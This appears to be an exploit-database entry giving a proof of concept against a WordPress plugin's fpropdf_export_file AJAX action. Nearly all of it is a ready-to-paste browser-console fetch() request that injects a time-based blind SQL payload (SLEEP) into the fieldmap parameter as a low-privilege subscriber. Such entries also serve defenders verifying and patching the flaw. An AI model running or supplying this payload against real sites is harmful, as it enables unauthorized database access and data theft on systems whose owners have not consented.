Share
## https://sploitus.com/exploit?id=WPEX-ID:DFA283F6-B0F3-4AA1-9FC4-52E2474C9F80
Run the below command in the developer console of the web browser while being on the blog as subscriber user

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": 'action=fpropdf_export_file&fieldmap=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(1)))a)',
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));